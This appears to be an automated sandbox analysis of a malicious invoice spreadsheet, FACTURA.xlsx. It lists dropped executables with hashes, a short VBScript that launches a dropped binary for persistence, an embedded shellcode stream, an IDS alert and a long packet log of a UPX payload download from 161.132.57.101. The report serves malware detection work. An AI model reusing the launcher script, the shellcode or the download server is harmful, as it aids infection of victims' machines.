                                                    SHA-512:16C468948E568343AB1A1460D82B4C5859D09043E3A0115AA9C0AEFEABFA22C796CCA505EDE8B1F194764DDA7C5263979230E3FA272EE1FB3B21919202B01906
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 58%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L...v.Wg.........."......`...`...p..0.............@..........................@............@...@.......@......................-..$........M...................1..........................................H...........................................UPX0.....p..............................UPX1.....`.......^..................@....rsrc....`.......R...b..............@..............................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....
                                                    Process:C:\Users\user\AppData\Local\Temp\kudo.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                    Category:dropped
                                                    Size (bytes):832512
                                                    Entropy (8bit):7.982751682789903
                                                    Encrypted:false
                                                    SSDEEP:24576:Erl6kD68JmlotQfXTwzecW/wCyFbxXdRC:yl328U2yfdcZFFd
                                                    MD5:D6B16370CD4E60185AA88607316A0C05
                                                    SHA1:7FBC63B1203617C67E5491745BEAEDB424BAED78
                                                    SHA-256:A6D6D1C8299F97F966D72373E999B5A8E6768914E27D5533307CF6878B95DCE2
                                                    SHA-512:16C468948E568343AB1A1460D82B4C5859D09043E3A0115AA9C0AEFEABFA22C796CCA505EDE8B1F194764DDA7C5263979230E3FA272EE1FB3B21919202B01906
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 58%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L...v.Wg.........."......`...`...p..0.............@..........................@............@...@.......@......................-..$........M...................1..........................................H...........................................UPX0.....p..............................UPX1.....`.......^..................@....rsrc....`.......R...b..............@..............................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....
                                                    Process:C:\Users\user\AppData\Local\complacence\outvaunts.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):282
                                                    Entropy (8bit):3.413807597635301
                                                    Encrypted:false
                                                    SSDEEP:6:DMM8lfm3OOQdUfcltr1UEZ+lX1GlSlTlTMu4dnriIM8lfQVn:DsO+vNlZ1Q1RlT2mA2n
                                                    MD5:53E5292C0AA6B8A852639152F91D8BA0
                                                    SHA1:A7CD051BF20BA1475E225E6B49392D871768E7C3
                                                    SHA-256:371EC639D393C68CE0084BAEEE5BCBC782D4DC6F0663374EB0FDA2DE08E7F328
                                                    SHA-512:DD218ADC701A34411D868CD36793D781DA549FF79520B165DEF80BBE169CC2A89D0121FE467193404B2763952D09397B441ABFF83EE07019BE9D535BC0263053
                                                    Malicious:true
                                                    Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.c.o.m.p.l.a.c.e.n.c.e.\.o.u.t.v.a.u.n.t.s...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):165
                                                    Entropy (8bit):1.4377382811115937
                                                    Encrypted:false
                                                    SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                    MD5:797869BB881CFBCDAC2064F92B26E46F
                                                    SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                    SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                    SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                    Malicious:true
                                                    Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                    File type:Microsoft Excel 2007+
                                                    Entropy (8bit):7.998089695306738
                                                    TrID:
                                                    • Excel Microsoft Office Open XML Format document (35004/1) 81.40%
                                                    • ZIP compressed archive (8000/1) 18.60%
                                                    File name:FACTURA.xlsx
                                                    File size:2'130'920 bytes
                                                    MD5:0c7d9bbd0cfe3621f076aae883009e36
                                                    SHA1:58d9da251f4466a6cd9fb7fb7f0cbb196425db2e
                                                    SHA256:b326ee834d3e9c27a5712b91bf28ac789ea8f715dfd17cca0cd6d0cc5ef18c9f
                                                    SHA512:b27cf3ce6bf03c9f31c326cf067f0732e8fd840b1d50ad01b062396093a44380aa1c30b4c10f11337f0471e0d29669808a951cc9c683e9631a0346c34338f41c
                                                    SSDEEP:49152:oEjkXhHug9Kj/w6M3G8swX4aBLiLS2ORvvLwxhpnIeHW:bQXhOWur8RXLLD2xxPIH
                                                    TLSH:B9A533D5DC51634BDCF842F2CAF4786A158DD4D98CC4CF543AEADBA102818D8BAF8267
                                                    File Content Preview:PK.........=.Y.V.#............[Content_Types].xmlUT.....Vg..Vg..Vg.T.N.0..#..U.....!.....$@.. k.-,..............ik.?v.......Hh.......|....Z......@R^+.<.b.(....F/..X0.c-fD.BJlf..V!..H..S..i*.j.j..t08.M...J...r4.V.[*n..{.db.(..yY..*Fk.E........mM.:4..!...J.
                                                    Icon Hash:2562ab89a7b7bfbf
                                                    Document Type:OpenXML
                                                    Number of OLE Files:1
                                                    Has Summary Info:
                                                    Application Name:
                                                    Encrypted Document:False
                                                    Contains Word Document Stream:False
                                                    Contains Workbook/Book Stream:True
                                                    Contains PowerPoint Document Stream:False
                                                    Contains Visio Document Stream:False
                                                    Contains ObjectPool Stream:False
                                                    Flash Objects Count:0
                                                    Contains VBA Macros:False
                                                    Author:EXCEL
                                                    Last Saved By:Administrator
                                                    Create Time:2022-05-16T17:34:45Z
                                                    Last Saved Time:2024-11-15T10:29:55Z
                                                    Creating Application:Microsoft Excel
                                                    Security:0
                                                    Thumbnail Scaling Desired:false
                                                    Company:
                                                    Contains Dirty Links:false
                                                    Shared Document:false
                                                    Changed Hyperlinks:false
                                                    Application Version:15.0300
                                                    General
                                                    Stream Path:\x1Ole10Native
                                                    CLSID:
                                                    File Type:data
                                                    Stream Size:2840840
                                                    Entropy:5.980996799134152
                                                    Base64 Encoded:True
                                                    Data ASCII:. Y + . . ~ . G . . . < . . . . . . . . . . . . . . . . . . . . . . . . . P . E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) D . . . . . . . . Y . ( . 1 . . \\ , . . . k . P X . P X P i . e . E ) K / ( m 9 . 6 P X W V V F P . . . . . . z . . b . . x g . . ^ ^ _ . . . . 9 . _ + M . . ~ v r . . . . . $ r ) ? j N # & X a m 9 W N . * A . > _ _ . . U g k & 0 . H $ q G . ; . . ( ^ T . $ . ^ j . c . . _ . - Z e X z r k # 3 ' . . e V Q 6 . " \\ s 9 j 3 . D . d R . . . l . m . S . A F E r * : a .
                                                    Data Raw:04 59 2b 00 03 7e 01 eb 47 0a 01 05 3c 93 c4 ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 06 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 29 c3 44 00 00 00 00 e8 00 00 00 00 59 eb 02 d1 28 eb 04 31 11 eb 17 eb 5c eb 2c 8d a9 b5 02 00 00 6b d2 00 50 58 eb 1d eb f1 50 58 eb e5 eb e9 eb 50 69 d2 17 8f fd
                                                    General
                                                    Stream Path:VU3jluXN
                                                    CLSID:
                                                    File Type:empty
                                                    Stream Size:0
                                                    Entropy:0.0
                                                    Base64 Encoded:False
                                                    Data ASCII:
                                                    Data Raw:
                                                    Timestamp                        SID      Signature                                                  Severity  Source IP       Source Port  Dest IP       Dest Port  Protocol
                                                    2024-12-10T07:04:57.871930+0100  2001046  ET MALWARE UPX compressed file download possible malware   3         161.132.57.101  443          192.168.2.22  49163      TCP
                                                    Timestamp                            Source Port  Dest Port  Source IP        Dest IP
                                                    Dec 10, 2024 07:04:55.658694029 CET  49163        443        192.168.2.22     161.132.57.101
                                                    Dec 10, 2024 07:04:55.658767939 CET  443          49163      161.132.57.101   192.168.2.22
                                                    Dec 10, 2024 07:04:55.658823013 CET  49163        443        192.168.2.22     161.132.57.101
                                                    Dec 10, 2024 07:04:55.674977064 CET  49163        443        192.168.2.22     161.132.57.101
                                                    Dec 10, 2024 07:04:55.675026894 CET  443          49163      161.132.57.101   192.168.2.22
                                                    Dec 10, 2024 07:04:57.071790934 CET  443          49163      161.132.57.101   192.168.2.22
                                                    Dec 10, 2024 07:04:57.071947098 CET  49163        443        192.168.2.22     161.132.57.101
                                                    Dec 10, 2024 07:04:57.078217030 CET  49163        443        192.168.2.22     161.132.57.101
                                                    Dec 10, 2024 07:04:57.078234911 CET  443          49163      161.132.57.101   192.168.2.22
                                                    Dec 10, 2024 07:04:57.078538895 CET  443          49163      161.132.57.101   192.168.2.22
                                                    Dec 10, 2024 07:04:57.078593969 CET  49163        443        192.168.2.22     161.132.57.101
                                                    Dec 10, 2024 07:04:57.153641939 CET  49163        443        192.168.2.22     161.132.57.101
                                                    Dec 10, 2024 07:04:57.195347071 CET  443          49163      161.132.57.101   192.168.2.22
                                                    Dec 10, 2024 07:04:57.589751005 CET  443          49163      161.132.57.101   192.168.2.22
                                                    Dec 10, 2024 07:04:57.589803934 CET  443          49163      161.132.57.101   192.168.2.22
                                                    Dec 10, 2024 07:04:57.589811087 CET  49163        443        192.168.2.22     161.132.57.101
                                                    Dec 10, 2024 07:04:57.589824915 CET  443          49163      161.132.57.101   192.168.2.22
                                                    Dec 10, 2024 07:04:57.589858055 CET  49163        443        192.168.2.22     161.132.57.101
                                                    Dec 10, 2024 07:04:57.589869976 CET  49163        443        192.168.2.22     161.132.57.101
                                                    Dec 10, 2024 07:04:57.589880943 CET  443          49163      161.132.57.101   192.168.2.22
                                                    Dec 10, 2024 07:04:57.589924097 CET  49163        443        192.168.2.22     161.132.57.101
                                                    Dec 10, 2024 07:04:57.679989100 CET  443          49163      161.132.57.101   192.168.2.22
                                                    Dec 10, 2024 07:04:57.680090904 CET  49163        443        192.168.2.22     161.132.57.101
                                                    Dec 10, 2024 07:04:57.793139935 CET  443          49163      161.132.57.101   192.168.2.22
                                                    Dec 10, 2024 07:04:57.793205023 CET  49163        443        192.168.2.22     161.132.57.101
                                                    Dec 10, 2024 07:04:57.826461077 CET  443          49163      161.132.57.101   192.168.2.22
                                                    Dec 10, 2024 07:04:57.826556921 CET  49163        443        192.168.2.22     161.132.57.101
                                                    Dec 10, 2024 07:04:57.851583958 CET  443          49163      161.132.57.101   192.168.2.22
                                                    Dec 10, 2024 07:04:57.851675034 CET  49163        443        192.168.2.22     161.132.57.101
                                                    Dec 10, 2024 07:04:57.871979952 CET  443          49163      161.132.57.101   192.168.2.22
                                                    Dec 10, 2024 07:04:57.872061014 CET  49163        443        192.168.2.22     161.132.57.101
                                                    Dec 10, 2024 07:04:57.975378990 CET  443          49163      161.132.57.101   192.168.2.22
                                                    Dec 10, 2024 07:04:57.975460052 CET  49163        443        192.168.2.22     161.132.57.101
                                                    Dec 10, 2024 07:04:57.994975090 CET  443          49163      161.132.57.101   192.168.2.22
                                                    Dec 10, 2024 07:04:57.995101929 CET  49163        443        192.168.2.22     161.132.57.101
                                                    Dec 10, 2024 07:04:58.008394003 CET  443          49163      161.132.57.101   192.168.2.22
                                                    Dec 10, 2024 07:04:58.008502960 CET  49163        443        192.168.2.22     161.132.57.101
                                                    Dec 10, 2024 07:04:58.021668911 CET  443          49163      161.132.57.101   192.168.2.22
                                                    Dec 10, 2024 07:04:58.021761894 CET  49163        443        192.168.2.22     161.132.57.101
                                                    Dec 10, 2024 07:04:58.033766985 CET  443          49163      161.132.57.101   192.168.2.22
                                                    Dec 10, 2024 07:04:58.033869982 CET  49163        443        192.168.2.22     161.132.57.101
                                                    Dec 10, 2024 07:04:58.045892954 CET  443          49163      161.132.57.101   192.168.2.22
                                                    Dec 10, 2024 07:04:58.046005964 CET  49163        443        192.168.2.22     161.132.57.101
                                                    Dec 10, 2024 07:04:58.092533112 CET  443          49163      161.132.57.101   192.168.2.22
                                                    Dec 10, 2024 07:04:58.092653036 CET  49163        443        192.168.2.22     161.132.57.101
                                                    Dec 10, 2024 07:04:58.100214005 CET  443          49163      161.132.57.101   192.168.2.22
                                                    Dec 10, 2024 07:04:58.100317955 CET  49163        443        192.168.2.22     161.132.57.101
                                                    Dec 10, 2024 07:04:58.168623924 CET  443          49163      161.132.57.101   192.168.2.22
                                                    Dec 10, 2024 07:04:58.168756962 CET  49163        443        192.168.2.22     161.132.57.101
                                                    Dec 10, 2024 07:04:58.179131985 CET  443          49163      161.132.57.101   192.168.2.22
                                                    Dec 10, 2024 07:04:58.179279089 CET  49163        443        192.168.2.22     161.132.57.101
                                                    Dec 10, 2024 07:04:58.186464071 CET  443          49163      161.132.57.101   192.168.2.22
                                                    Dec 10, 2024 07:04:58.186572075 CET  49163        443        192.168.2.22     161.132.57.101
                                                    Dec 10, 2024 07:04:58.194026947 CET  443          49163      161.132.57.101   192.168.2.22
                                                    Dec 10, 2024 07:04:58.194123983 CET  49163        443        192.168.2.22     161.132.57.101
                                                    Dec 10, 2024 07:04:58.201452017 CET  443          49163      161.132.57.101   192.168.2.22
                                                    Dec 10, 2024 07:04:58.201545000 CET  49163        443        192.168.2.22     161.132.57.101
                                                    Dec 10, 2024 07:04:58.211267948 CET  443          49163      161.132.57.101   192.168.2.22
                                                    Dec 10, 2024 07:04:58.211363077 CET  49163        443        192.168.2.22     161.132.57.101
                                                    Dec 10, 2024 07:04:58.218724012 CET  443          49163      161.132.57.101   192.168.2.22
                                                    Dec 10, 2024 07:04:58.218815088 CET  49163        443        192.168.2.22     161.132.57.101
                                                    Dec 10, 2024 07:04:58.224566936 CET  443          49163      161.132.57.101   192.168.2.22
                                                    Dec 10, 2024 07:04:58.224658012 CET  49163        443        192.168.2.22     161.132.57.101
                                                    Dec 10, 2024 07:04:58.256345987 CET  443          49163      161.132.57.101   192.168.2.22
                                                    Dec 10, 2024 07:04:58.256474018 CET  49163        443        192.168.2.22     161.132.57.101
                                                    Dec 10, 2024 07:04:58.262293100 CET  443          49163      161.132.57.101   192.168.2.22
                                                    Dec 10, 2024 07:04:58.262411118 CET  49163        443        192.168.2.22     161.132.57.101
                                                    Dec 10, 2024 07:04:58.267852068 CET  443          49163      161.132.57.101   192.168.2.22
                                                    Dec 10, 2024 07:04:58.267940044 CET  49163        443        192.168.2.22     161.132.57.101
                                                    Dec 10, 2024 07:04:58.357255936 CET  443          49163      161.132.57.101   192.168.2.22
                                                    Dec 10, 2024 07:04:58.357327938 CET  49163        443        192.168.2.22     161.132.57.101
                                                    Dec 10, 2024 07:04:58.362662077 CET  443          49163      161.132.57.101   192.168.2.22
                                                    Dec 10, 2024 07:04:58.362744093 CET  49163        443        192.168.2.22     161.132.57.101
                                                    Dec 10, 2024 07:04:58.367453098 CET  443          49163      161.132.57.101   192.168.2.22
                                                    Dec 10, 2024 07:04:58.367528915 CET  49163        443        192.168.2.22     161.132.57.101
                                                    Dec 10, 2024 07:04:58.372164965 CET  443          49163      161.132.57.101   192.168.2.22
                                                    Dec 10, 2024 07:04:58.372231960 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.376920938 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.376987934 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.383088112 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.383162022 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.387737036 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.387811899 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.392539024 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.392607927 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.397114992 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.397177935 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.403212070 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.403285980 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.407154083 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.407228947 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.413137913 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.413213968 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.417731047 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.417800903 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.449711084 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.449791908 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.454328060 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.454399109 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.459930897 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.460004091 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.550086021 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.550179958 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.553899050 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.553972960 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.557430029 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.557497025 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.562278986 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.562351942 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.565907955 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.565975904 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.569744110 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.569820881 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.573412895 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.573479891 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.578212023 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.578279972 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.581996918 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.582063913 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.586224079 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.586293936 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.590018034 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.590089083 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.593698025 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.593780041 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.598778963 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.598844051 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.640783072 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.640866995 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.643879890 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.643942118 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.647597075 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.647682905 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.650830030 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.741619110 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.741759062 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.744245052 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.744342089 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.747678995 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.747750998 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.751979113 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.752043009 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.755311012 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.755395889 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.759052992 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.759119987 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.762064934 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.762135029 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.766371965 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.766438961 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.769689083 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.769748926 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.773159027 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.773257971 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.776870966 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.776937962 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.780318975 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.780395985 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.784631968 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.784730911 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.787946939 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.788033962 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.834547997 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.834665060 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.838836908 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.838912964 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.842154980 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.842236996 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.936160088 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.936280966 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.939361095 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.939448118 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.942629099 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.942753077 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.946810007 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.946892977 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.950092077 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.950160980 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.953444958 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.953510046 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.957725048 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.957809925 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.960953951 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.961052895 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.964809895 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.964890957 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.968035936 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.968115091 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.971434116 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.971534014 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.974642038 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.974725962 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:58.978929043 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:58.979010105 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.025809050 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:59.025958061 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.029153109 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:59.029277086 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.033364058 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:59.033447027 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.126660109 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:59.126769066 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.129757881 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:59.129842043 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.133040905 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:59.133114100 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.137281895 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:59.137357950 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.140501976 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:59.140573025 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.144010067 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:59.144085884 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.147221088 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:59.147316933 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.151478052 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:59.151595116 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.154773951 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:59.154851913 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.158077002 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:59.158150911 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.161803007 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:59.161870003 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.165121078 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:59.165241957 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.169339895 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:59.169413090 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.217730999 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:59.217875957 CET44349163161.132.57.101192.168.2.22
                                                    Dec 10, 2024 07:04:59.217881918 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.217943907 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.218544960 CET49163443192.168.2.22161.132.57.101
                                                    Dec 10, 2024 07:04:59.218565941 CET44349163161.132.57.101192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 10, 2024 07:04:55.038240910 CET | 54562 | 53 | 192.168.2.22 | 8.8.8.8
Dec 10, 2024 07:04:55.616468906 CET | 53 | 54562 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
